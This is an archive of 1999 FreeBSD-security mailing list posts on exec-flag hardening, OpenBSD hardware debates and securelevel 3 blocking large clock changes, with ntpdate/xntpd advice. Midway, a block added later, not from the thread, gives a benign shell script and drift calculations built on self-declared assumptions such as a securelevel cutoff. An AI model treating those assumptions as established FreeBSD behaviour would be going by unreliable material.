From owner-freebsd-security Wed Aug 18 16:55:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id D09B115915 for ; Wed, 18 Aug 1999 16:55:45 -0700 (PDT) (envelope-from barrett@phoenix.aye.net)
Received: (qmail 10878 invoked by uid 1000); 18 Aug 1999 23:48:23 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 Aug 1999 23:48:23 -0000
Date: Wed, 18 Aug 1999 19:48:23 -0400 (EDT)
From: Barrett Richardson
To: Mike Tancsa
Cc: freebsd-security@freebsd.org
Subject: Re: Any work around for this FreeBSD bug/DoS ?
In-Reply-To: <4.1.19990817212048.0526b150@granite.sentex.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 17 Aug 1999, Mike Tancsa wrote:

> >I've been using a mechanism that prevents the running of arbitrary
> >executables on my systems. I require a flag bit to be set for an
> >executable to be run -- so if a script kiddie uploads or creates
> >a binary executable it won't run, unless I approve it by setting the
> >flag. At the moment I let shell scripts slide which will leave you
> >vulnerable to perl -- but that could be easily changed.
>
> Interesting concept, but I guess it would get only the dumbest script
> kiddies. Also, more and more exploits seem to be released on perl to make
> them 'cross platform compatible'.
>
> ---Mike

Indeed true, but not a problem. Require scripts to have the flag also,
and hack perl to check for the flag for scripts passed on the command
line. I currently am not implementing it this way, but have it ready
to go into place should it become a problem.

Additionally I put a small hack into ld-elf.so.1 so that everything gets
the same level of trust as a suid executable as far as LD_LIBRARY_PATH
is concerned.

- Barrett

From owner-freebsd-security Wed Aug 18 17:22:36 1999
Delivered-To: freebsd-security@freebsd.org
Received: from eunice.vinton.com (eunice-out.vinton.com [204.202.33.15]) by hub.freebsd.org (Postfix) with ESMTP id E212314C24 for ; Wed, 18 Aug 1999 17:22:34 -0700 (PDT) (envelope-from jrozes+935022158.3658973423@vinton.com)
Received: from molloy.vinton.com (molloy.vinton.com [204.202.33.3]) by eunice.vinton.com (8.8.8/8.8.7) with ESMTP id RAA07765; Wed, 18 Aug 1999 17:22:38 -0700 (PDT)
Received: (from jrozes@localhost) by molloy.vinton.com (8.8.8/8.8.8) id RAA00952; Wed, 18 Aug 1999 17:22:38 -0700 (PDT)
X-Authentication-Warning: molloy.vinton.com: jrozes set sender to jrozes+935022158.3658973423@vinton.com using -f
Date: Wed, 18 Aug 1999 17:22:36 -0700 (PDT)
From: Jonathan Rozes
Reply-To: Jonathan Rozes
To: Barrett Richardson
Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 18 Aug 1999, Barrett Richardson wrote:

> Indeed true, but not a problem. Require scripts to have the flag also,
> and hack perl to check for the flag for scripts passed on the command
> line.

That's not enough to 'fix' perl. You'll also need to take away from perl
the ability to use the '-e' switch and the ability to read from stdin.
If you want to be really pedantic, you could also force taint checking for
all scripts, regardless of whether they want it or not.

I started to implement something like this for OpenBSD, using the regular
filesystem immutable flag on binaries, but stopped when I kept thinking of
new ways for a determined attacker to bypass it. In the end, I just
arranged things such that all filesystems with directories writable by
non-root users were mounted noexec.

> Additionally I put a small hack into ld-elf.so.1 so that everything gets
> the same level of trust as a suid executable as far as LD_LIBRARY_PATH
> is concerned.

Why use shared libraries at all on a security-critical system?

Cheers,
jonathan

+++ Jonathan Rozes, System Administrator, Will Vinton Studios

From owner-freebsd-security Wed Aug 18 18:32:34 1999
Delivered-To: freebsd-security@freebsd.org
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id B318015926; Wed, 18 Aug 1999 18:32:26 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au)
Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id LAA12008; Thu, 19 Aug 1999 11:30:57 +1000 (EST)
From: Darren Reed
Message-Id: <199908190130.LAA12008@cheops.anu.edu.au>
Subject: Re: OpenBSD
To: jmb@hub.freebsd.org (Jonathan M. Bresler)
Date: Thu, 19 Aug 1999 11:30:56 +1000 (EST)
Cc: mike@argos.org, brett@lariat.org, freebsd-security@FreeBSD.ORG
In-Reply-To: <19990818201702.DC37214FF0@hub.freebsd.org> from "Jonathan M. Bresler" at Aug 18, 99 01:17:02 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Jonathan M. Bresler, sie said:
>
> > I'd sure hope so... Let's face it -- even though FreeBSD is (in my
> > opinion) the most "robust" out of the bunch, the x86 architecture isn't
> > going to win any awards for performance.... Cheap, yes. Easy, yes.
> > Works for the most part, yes. But it's still based off of the idea that
> > we need to be backwards-compatible with the late 1700's. The Alpha port
> > of FBSD is A Good Thing (I'm hoping to try it out this weekend on a couple
> > of the Alpha machines I have available for playing with), but the high-end
> > boxes are pretty pricey. You can find multi-processor SPARC machines
> > being practically given away by companies who don't know what they're
> > capable of, not to mention several other platforms.
>
>
> this is incorrect. the intel processors knock the snot out of
> sparc in integer performance. take a look at the hint benchmark for
> example. the benchmark is in the ports tree.
>
> the alpha on the other hand knocks the intel flat on the mat.

I see. No wonder the world has to put up with such an Intel-dominated
marketplace, people can't look past the bang-for-bucks statistics.

When you're running a fileserver, SPECint/SPECfp aren't really that
significant. At the same time, I wouldn't be looking for a 12GB/s box
if I wanted to do word processing either.

Whilst your PC might be running at 100s of MHz, it probably stops hundreds
of times a second, waiting for something. Talk to someone who knows about
mainframes and see how often one of their CPUs will stall (for anything).
They don't have FEP's, DASD, etc, for nothing.

From owner-freebsd-security Wed Aug 18 18:55:14 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 8503415893 for ; Wed, 18 Aug 1999 18:55:12 -0700 (PDT) (envelope-from jwyatt@bsdie.rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1421 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Wed, 18 Aug 1999 20:50:01 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7)
Date: Wed, 18 Aug 1999 20:49:45 -0500 (CDT)
From: James Wyatt
To: Brett Glass
Cc: Thomas Uhrfelt , James Gill , freebsd-security@FreeBSD.ORG
Subject: RE: OpenBSD
In-Reply-To: <4.2.0.58.19990817234258.0479b3b0@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 17 Aug 1999, Brett Glass wrote:
> At 07:25 AM 8/18/99 +0200, Thomas Uhrfelt wrote:
> >I for one would love to see the talented programmers/designers of OpenBSD
> >merge in their excellent features into FreeBSD and join our happy family.
>
> One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained
> on quite a few CPUs and machine architectures. Would FreeBSD be willing to
> go that route?

I would *love* to see FreeBSD run on the PPC as well. Linux runs like a
bat-out-of-hell on PPC and there looks to be more OEM motherboard support
soon if IBM releases their MB designs (as they are discussing doing). When
I get my Alpha back, the NT/Linux image is going away for FreeBSD/Alpha!

From owner-freebsd-security Wed Aug 18 19:52:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id ADD651595D for ; Wed, 18 Aug 1999 19:52:49 -0700 (PDT) (envelope-from barrett@phoenix.aye.net)
Received: (qmail 20264 invoked by uid 1000); 19 Aug 1999 02:44:40 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 19 Aug 1999 02:44:40 -0000
Date: Wed, 18 Aug 1999 22:44:39 -0400 (EDT)
From: Barrett Richardson
To: Jonathan Rozes
Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG
Subject: Re: Any work around for this FreeBSD bug/DoS ?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 18 Aug 1999, Jonathan Rozes wrote:

> On Wed, 18 Aug 1999, Barrett Richardson wrote:
>
>
> That's not enough to 'fix' perl. You'll also need to take away from perl
> the ability to use the '-e' switch and the ability to read from stdin. If
> you want to be really pedantic, you could also force taint checking for
> all scripts, regardless of whether they want it or not.

Thanks for the info. This is useful.

>
> I started to implement something like this for OpenBSD, using the regular
> filesystem immutable flag on binaries, but stopped when I kept thinking of
> new ways for a determined attacker to bypass it. In the end, I just

Good point. The motivation for such a scheme is that it foils the script
kiddies that just use *canned* exploits, which in my case includes *all*
of my attackers. If an imperfect model keeps them at bay even though the
model is imperfect, it helps out.
Back to the original argument of the code that was posted, script kiddie
wannabes can't run it on my system unless I approve it (and I don't plan on
approving it) or they have to engineer a means to do the same themselves
(not typical script kiddie behaviour). The script kiddie has to work harder
-- which is the goal of most any security scheme -- decreasing the fruits
of labor for the attacker by increasing their resource expenditure. There
is probably a way to run some arbitrary code with a mmap or function
pointer hook in some software, but script kiddies for the most part aren't
at that skill level yet. True that someday the scheme will be completely
useless (FreeBSD 2.0.5 was once "secure"), but if it can save me a panic or
two (or a breach) in the meantime the time it took to patch the kernel and
set the flag on binaries was well spent. It's kind of a kludge, but it's
not completely useless.

> arranged things such that all filesystems with directories writable by
> non-root users were mounted noexec.
>
> > Additionally I put a small hack into ld-elf.so.1 so that everything gets
> > the same level of trust as a suid executable as far as LD_LIBRARY_PATH
> > is concerned.
>
> Why use shared libraries at all on a security-critical system?

Another good point. The motivation here is when I don't need espionage
level security I get some extra insurance at low cost.

- Barrett

>
> Cheers,
> jonathan
>
> +++ Jonathan Rozes, System Administrator, Will Vinton Studios

From owner-freebsd-security Thu Aug 19 00:32:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bifrost.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id 3A3F414E9B for ; Thu, 19 Aug 1999 00:32:41 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se)
Received: (from uucp@localhost) by bifrost.infologigruppen.se (8.9.2/8.8.8) id WAA14181 for ; Wed, 18 Aug 1999 22:02:44 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se)
Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdp14179; Wed Aug 18 22:02:38 1999
Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Wed, 18 Aug 1999 21:55:03 +0200
Message-ID:
From: "Lowkrantz, Goran"
To: "'freebsd-security@FreeBSD.ORG'"
Subject: Securelevel 3 and setting time
Date: Wed, 18 Aug 1999 21:54:53 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

Just found that I can't correct the time on my firewall, running at security
level 3. When I try I get the following:

date: settimeofday (timeval): Operation not permitted

Is this by design? If so, why?

Cheers,
Goran L

From owner-freebsd-security Thu Aug 19 09:29:23 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 39FFD14EA4 for ; Thu, 19 Aug 1999 09:29:18 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id MAA21800; Thu, 19 Aug 1999 12:27:53 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Thu, 19 Aug 1999 12:27:53 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: "Mikhail A. Sokolov"
Cc: Tom Brown , "'freebsd-security@freebsd.org'"
Subject: Re: "Secure-FreeBSD" Idea
In-Reply-To: <19990813031813.A94114@demos.su>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 13 Aug 1999, Mikhail A. Sokolov wrote:

> On Thu, Aug 12, 1999 at 09:52:48AM -0700, Tom Brown wrote:
> # HI,
> #
> # Now realistically all this would have to be is a really anal installation
> # process, forcing the user to positively select services such as ftp,
> # telnet, sendmail etc. So if you don't select anything, you can't do much.
> # It would also have carefully set UMASKS and probably come with some easy
> # way to get the user to set-up tripwire and ipfw for example.
> #
> # I suspect that most of the readers of this list spend a fair amount of
> # time going through the same laborious process of tying down each server
> # they built. How about we pool this vast collection of procedures together
> # and try to build some kind of a security release. We all know (well at
> # least I hope we do!) what a solid O/S FreeBSD is, wouldn't this be the
> # ideal opportunity to push the OS further into the public eye?
>
> Robert Watson has some tools, which are supposed to be bringing standard
> system install to somewhat more secure state, it was under the idea
> of 'the freebsd hardening project'. I guess he reads this list and could
> comment, actually.

I'm currently on vacation several hundred miles from my development tree,
but will be back in town next week and continuing work on the POSIX.1e
extensions, primarily auditing at this point. The hardening project
suffers from a lack of time on my part, and no doubt others also. Jan's
HOW-TO is a useful tool for those wanting to harden a system--creating a
software tool to manage his instructions for you (i.e., check the boxes to
apply the restrictions he describes, with online help from the howto) would
be great if someone wants to hack one up. Continued work to reduce
setuid/setgid utilities and move away from /dev/kmem are always good things
to do, also. I hope to be releasing some more auditing code in about a
month or so, which includes some IDS code that might be useful.

Anyhow, I'm back off to vacationing, but will no doubt have some comments
concerning the dozens of other -security mails that seem to have arrived
over the past week :-).
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Computing Laboratory at Cambridge University Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 9:59:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from sf1-smtp01.hamquist.com (sf1-smtp01.hamquist.com [199.108.89.4]) by hub.freebsd.org (Postfix) with SMTP id 76D551511C for ; Thu, 19 Aug 1999 09:59:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from 10.40.251.222 by sf1-smtp01.hamquist.com with ESMTP ( WorldSecure Server SMTP Relay(WSS) v3.6); Thu, 19 Aug 99 09:59:20 -0700 X-Server-Uuid: c29e0ff2-e8b9-11d1-a493-00c04fbbd7d3 Received: by sf1-mail03 with Internet Mail Service (5.5.2448.0) id ; Thu, 19 Aug 1999 09:59:19 -0700 Message-ID: From: "Childers, Richard" To: "'marc rassbach '" , "'Narvi '" Cc: "'Wes Peters '" , "'Brett Glass '" , "'Jordan K. Hubbard '" , "'James Gill '" , "'freebsd-security@FreeBSD.ORG '" Subject: RE: OpenBSD Date: Thu, 19 Aug 1999 09:59:17 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) X-WSS-ID: 1BA2E86D675612-01-02 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "... if any kind of move is thought of, WHERE to move to should be researched." This would be an interesting niche for an enterprising data haven on an abandoned oil derrick or anchored freighter; source tree host ... "And if no such place on this planet can be found, in a few years, there's always a space station." Or a satellite; there are are several amateur radio satellites in orbit, several of them operate on 2 meters or 10 meters (they act as store and forward packet digipeaters) ... 
and I've been noticing that web servers have been getting pretty small,
physically speaking ... (-;

-- richard

Richard Childers
Senior UNIX Systems Administrator
Hambrecht & Quist, LLC

From owner-freebsd-security Thu Aug 19 11:21:03 1999
From: Archie Cobbs
Message-Id: <199908191819.LAA94866@bubba.whistle.com>
Subject: Re: Securelevel 3 ant setting time
In-Reply-To: from "Lowkrantz, Goran" at "Aug 18, 1999 09:54:53 pm"
To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran)
Date: Thu, 19 Aug 1999 11:19:18 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG

Lowkrantz, Goran writes:
> Just found that I can't correct the time on my firewall, running at security
> level 3. When I try I get the following:
>
> date: settimeofday (timeval): Operation not permitted
>
> Is this by design? If so, why?

Yes, this is to prevent attacks that use wrong time settings.
You are allowed to change the time a little bit, just not a lot.

The solution would be to do something like this..

 - At boot time, before setting the securelevel, run ntpdate
 - Run xntpd normally

-Archie

___________________________________________________________________________
Archie Cobbs * Whistle Communications, Inc.
* http://www.whistle.com

From owner-freebsd-security Thu Aug 19 14:52:35 1999
Message-ID: <37BC7BF7.B261D91A@softweyr.com>
Date: Thu, 19 Aug 1999 15:49:43 -0600
From: Wes Peters
Organization: Softweyr LLC
To: "Childers, Richard"
Cc: "'marc rassbach'", "'Narvi'", "'Brett Glass'", "'Jordan K. Hubbard'", "'James Gill'", "'freebsd-security@FreeBSD.ORG'"
Subject: Re: OpenBSD

"Childers, Richard" wrote:
>
> "And if no such place on this planet can be found, in a few years,
> there's always a space station."
>
> Or a satellite; there are several amateur radio satellites in orbit,
> several of them operate on 2 meters or 10 meters (they act as store and
> forward packet digipeaters) ... and I've been noticing that web servers have
> been getting pretty small, physically speaking ...

You get it set up, I'll get it launched for you.
My Alma Mater is working on a new recycled launch platform to get their latest
satellite in orbit:

http://catsis.weber.edu/mediarelations/PressRelease/1998/021798cast.htm

I worked on the tracking software for Weber's first satellite, NUSAT-1.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                  Softweyr LLC
http://softweyr.com/                                   wes@softweyr.com

From owner-freebsd-security Thu Aug 19 15:20:40 1999
Message-Id: <4.2.0.58.19990819161554.04790800@localhost>
Date: Thu, 19 Aug 1999 16:17:20 -0600
To: Archie Cobbs, Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran)
From: Brett Glass
Subject: Re: Securelevel 3 ant setting time
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199908191819.LAA94866@bubba.whistle.com>

My server uses a cron job and ntpupdate to grab the time from the best of
several accurate government servers. Would securelevel 3 allow this?

--Brett Glass

At 11:19 AM 8/19/99 -0700, Archie Cobbs wrote:
>Lowkrantz, Goran writes:
> > Just found that I can't correct the time on my firewall, running at security
> > level 3. When I try I get the following:
> >
> > date: settimeofday (timeval): Operation not permitted
> >
> > Is this by design? If so, why?
>
>Yes, this is to prevent attacks that use wrong time settings.
>You are allowed to change the time a little bit, just not a lot.
>
>The solution would be to do something like this..
>
> - At boot time, before setting the securelevel, run ntpdate
> - Run xntpd normally
>
>-Archie
>
>___________________________________________________________________________
>Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com

From owner-freebsd-security Thu Aug 19 15:32:44 1999
Date: Thu, 19 Aug 1999 16:30:47 -0600 (MDT)
From: "David G. Andersen"
To: Brett Glass
Cc: Archie Cobbs, Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
In-Reply-To: Brett Glass's message of Thu, August 19 1999 <4.2.0.58.19990819161554.04790800@localhost>
References: <199908191819.LAA94866@bubba.whistle.com> <4.2.0.58.19990819161554.04790800@localhost>
Message-ID: <14268.33906.359749.40458@torrey.cs.utah.edu>

"Maybe". (Probably?)

When ntpdate sees a small time delta (less than 1/2 second off), it will use
the adjtime() call to slew the clock time, which is permitted. However, if the
delta is large for some reason, then it will go in and use the sledgehammer
approach - settimeofday().

From the ntpdate manpage:

    The latter technique is less disruptive and more accurate when the offset
    is small, and works quite well when ntpdate is run by cron(8) every hour
    or two.

So, you'll probably be OK doing it that way, *but* if you get too far off
during the time period, then you won't be able to correct for it.

-Dave

Lo and Behold, Brett Glass said:
> My server uses a cron job and ntpupdate to grab the time from the
> best of several accurate government servers. Would securelevel 3 allow
> this?

--
work: danderse@cs.utah.edu                     me: angio@pobox.com
University of Utah CS Department             http://www.angio.net/
"If you haul a geek up a crack, you will bloody their fingers for a day...
 If you teach a geek to climb, you will bloody their fingers for life."
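A worked version of the advice exchanged so far, added here as an example; it is not a script from anyone in the thread or from the ntp distribution. It is a POSIX sh rc.d-style script whose `start` action steps the clock once with a single `ntpdate -b` run over every configured server before the securelevel is raised (Archie Cobbs' boot-time step, plus the one-command-line point Rod Grimes makes further down the thread), and whose `check` action models David Andersen's description of ntpdate's choice between adjtime() and settimeofday(), using the half-second limit he quotes and the 5-minutes-per-12-hours drift figure Brett Glass gives later. The server names, the `NTP_SERVERS` variable, the securelevel cutoff of 0 and all function names are assumptions of this example, not values from the thread or from FreeBSD.

```shell
#!/bin/sh
# Added example, not a script from the thread or from the ntp distribution.
# "start": step the clock with ONE ntpdate run over all servers, before the
#          securelevel is raised (Archie Cobbs' boot-time step, Rod Grimes'
#          one-command-line advice).
# "check": model the rule David Andersen quotes: offsets under 0.5 s are slewed
#          with adjtime(), larger ones are stepped with settimeofday(), which
#          securelevel 3 refuses.
# Server names below are constructed placeholders.

NTP_SERVERS="${NTP_SERVERS:-clock.example.net ntp1.example.net ntp2.example.net}"
SLEW_LIMIT=0.5          # half-second threshold quoted in the thread

# One ntpdate invocation listing every server, so ntpdate itself picks the
# best sample instead of a shell loop trying servers one at a time.
# -b forces a step, which is fine while the securelevel is still low.
build_ntpdate_cmd() {
    [ -n "$1" ] || return 1
    cmd="ntpdate -b"
    for s in $1; do cmd="$cmd $s"; done
    echo "$cmd"
}

# kern.securelevel, or -1 when sysctl is unavailable (non-FreeBSD test host).
current_securelevel() {
    sysctl -n kern.securelevel 2>/dev/null || echo -1
}

# Assumption taken from the thread's advice: only step while the securelevel
# has not yet been raised above 0 (FreeBSD's exact cutoff may differ).
step_allowed() {
    [ "$1" -le 0 ]
}

# Offset (s) that builds up between two ntpdate runs on a clock gaining
# $1 seconds every $2 seconds when polled every $3 seconds. ntpdate resets
# the offset but never corrects the rate, so this offset recurs every run.
offset_after() {
    awk -v d="$1" -v p="$2" -v i="$3" 'BEGIN { printf "%.3f\n", d / p * i }'
}

# Which call ntpdate would make; a non-empty $2 mimics a -DSLEWALWAYS build.
choose_correction() {
    awk -v o="$1" -v sa="${2:-0}" -v lim="$SLEW_LIMIT" 'BEGIN {
        if (o < 0) o = -o
        r = (sa || o < lim) ? "slew" : "step"
        print r
    }'
}

# Longest cron interval (s) that still keeps ntpdate on the adjtime() path.
max_safe_interval() {
    awk -v d="$1" -v p="$2" -v lim="$SLEW_LIMIT" 'BEGIN { printf "%.0f\n", lim / (d / p) }'
}

case "$1" in
start)
    lvl=$(current_securelevel)
    if step_allowed "$lvl"; then
        cmd=$(build_ntpdate_cmd "$NTP_SERVERS") || exit 1
        echo "securelevel $lvl: $cmd"
        eval "$cmd"
    else
        echo "securelevel $lvl already raised; not stepping the clock" >&2
        exit 2
    fi
    ;;
check)
    # e.g. "check 300 43200 3600": 5 min gained per 12 h, polled hourly
    off=$(offset_after "$2" "$3" "$4")
    echo "offset per run: ${off}s -> $(choose_correction "$off")"
    echo "with SLEWALWAYS: $(choose_correction "$off" 1)"
    echo "longest interval that still slews: $(max_safe_interval "$2" "$3") s"
    ;;
esac
```

Run as `sh ntpdate_boot.sh check 300 43200 3600` for Brett's worst clock: an hourly cron run sees a 25 s offset, which lands on the settimeofday() path that securelevel 3 refuses; only a run every 72 s or less, or a SLEWALWAYS build, stays on adjtime(). That is the quantitative form of David's "if you get too far off during the time period" caveat.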
From owner-freebsd-security Thu Aug 19 15:46:29 1999
From: "Lowkrantz, Goran"
To: "'David G. Andersen'"
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: Securelevel 3 ant setting time
Date: Fri, 20 Aug 1999 00:46:13 +0200

Hi,

I got it working. I added a script to /usr/local/etc/rc.d that runs ntpdate
during boot before securelevel is set. I made it a small script as I check time
from a few servers and if one doesn't work, I test with the next one.

Thanks,
GLZ

-----Original Message-----
From: David G. Andersen [mailto:danderse@cs.utah.edu]
Sent: Friday, August 20, 1999 12:31 AM
To: Brett Glass
Cc: Archie Cobbs; Goran.Lowkrantz@infologigruppen.se; freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time

"Maybe". (Probably?)

When ntpdate sees a small time delta (less than 1/2 second off), it will use
the adjtime() call to slew the clock time, which is permitted. However, if the
delta is large for some reason, then it will go in and use the sledgehammer
approach - settimeofday().
From the ntpdate manpage:

    The latter technique is less disruptive and more accurate when the offset
    is small, and works quite well when ntpdate is run by cron(8) every hour
    or two.

So, you'll probably be OK doing it that way, *but* if you get too far off
during the time period, then you won't be able to correct for it.

-Dave

Lo and Behold, Brett Glass said:
> My server uses a cron job and ntpupdate to grab the time from the
> best of several accurate government servers. Would securelevel 3 allow
> this?

--
work: danderse@cs.utah.edu                     me: angio@pobox.com
University of Utah CS Department             http://www.angio.net/
"If you haul a geek up a crack, you will bloody their fingers for a day...
 If you teach a geek to climb, you will bloody their fingers for life."

From owner-freebsd-security Thu Aug 19 16:15:38 1999
Date: Thu, 19 Aug 1999 16:14:42 -0700 (PDT)
From: Doug
To: Brett Glass
Cc: Archie Cobbs, Lowkrantz Goran, "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Securelevel 3 ant setting time
In-Reply-To: <4.2.0.58.19990819161554.04790800@localhost>

On Thu, 19 Aug 1999, Brett Glass wrote:

> My server uses a cron job and ntpupdate to grab the time from the
> best of several accurate government servers. Would securelevel 3 allow
> this?

If you're going to do this anyway, why not just use xntpd? It's more reliable,
has better mechanisms to resolve the skew between your various time sources,
and will keep your clock within the range of adjustments that are allowable in
securelevel 3.

Doug

--
On account of being a democracy and run by the people, we are the only nation
in the world that has to keep a government four years, no matter what it does.
        -- Will Rogers

From owner-freebsd-security Thu Aug 19 17:31:07 1999
From: "Rodney W. Grimes"
Message-Id: <199908200029.RAA22415@gndrsh.dnsmgr.net>
Subject: Re: Securelevel 3 ant setting time
In-Reply-To: <14268.33906.359749.40458@torrey.cs.utah.edu> from "David G. Andersen" at "Aug 19, 1999 04:30:47 pm"
To: danderse@cs.utah.edu (David G. Andersen)
Date: Thu, 19 Aug 1999 17:29:15 -0700 (PDT)
Cc: brett@lariat.org (Brett Glass), archie@whistle.com (Archie Cobbs), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG

>
> "Maybe". (Probably?)
>
> When ntpdate sees a small time delta (less than 1/2 second off), it
> will use the adjtime() call to slew the clock time, which is
> permitted.
> However, if the delta is large for some reason, then it
> will go in and use the sledgehammer approach - settimeofday().
>
> From the ntpdate manpage:
>
>     The latter technique is less disruptive and
> more accurate when the offset is small, and works quite well when ntpdate
> is run by cron(8) every hour or two.
>
> So, you'll probably be OK doing it that way, *but* if you get too far
> off during the time period, then you won't be able to correct for it.

You can compile ntp/xntpd with the -DSLEWALWAYS option and it will work for
you. I had to go grep the source to make sure that ntpdate obeyed this and it
does:

    ntpdate/ntpdate.c:#ifdef SLEWALWAYS
    ntpdate/ntpdate.c:#else /* SLEWALWAYS */
    ntpdate/ntpdate.c:#endif /* SLEWALWAYS */

Though a quick reading of the code shows that it does not remove -b as a valid
option, and from a quick lookover this should probably just be a runtime option
instead of a compile time option....

> -Dave
>
> Lo and Behold, Brett Glass said:
> > My server uses a cron job and ntpupdate to grab the time from the
> > best of several accurate government servers. Would securelevel 3 allow
> > this?
>
> --
> work: danderse@cs.utah.edu                     me: angio@pobox.com
> University of Utah CS Department             http://www.angio.net/
> "If you haul a geek up a crack, you will bloody their fingers for a day...
>  If you teach a geek to climb, you will bloody their fingers for life."
--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Thu Aug 19 17:36:58 1999
From: "Rodney W. Grimes"
Message-Id: <199908200034.RAA22564@gndrsh.dnsmgr.net>
Subject: Re: Securelevel 3 ant setting time
In-Reply-To: from "Lowkrantz, Goran" at "Aug 20, 1999 00:46:13 am"
To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran)
Date: Thu, 19 Aug 1999 17:34:53 -0700 (PDT)
Cc: danderse@cs.utah.edu ('David G. Andersen'), freebsd-security@FreeBSD.ORG

X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain; charset="windows-1252"
[Charset windows-1252 unsupported, skipping...]

Please don't do that Windoze crudd...

Hi,

I got it working. I added a script to /usr/local/etc/rc.d that runs ntpdate
during boot before securelevel is set. I made it a small script as I check time
from a few servers and if one doesn't work, I test with the next one.
You should let ntpdate make those decisions for you, list ALL of the time
servers on the one command line:

    ntpdate clock.llnl.gov ntp.someisp.there date.someotherisp.here my.clock.server

Is much much much better than a loop over 4 calls to ntpdate, as ntpdate knows
a lot more about time protocols and will generate a best time using the data
from 1 to N of the clocks given as arguments. Please read the man pages...

Thanks,
GLZ

-----Original Message-----
From: David G. Andersen [mailto:danderse@cs.utah.edu]
Sent: Friday, August 20, 1999 12:31 AM
To: Brett Glass
Cc: Archie Cobbs; Goran.Lowkrantz@infologigruppen.se; freebsd-security@FreeBSD.ORG
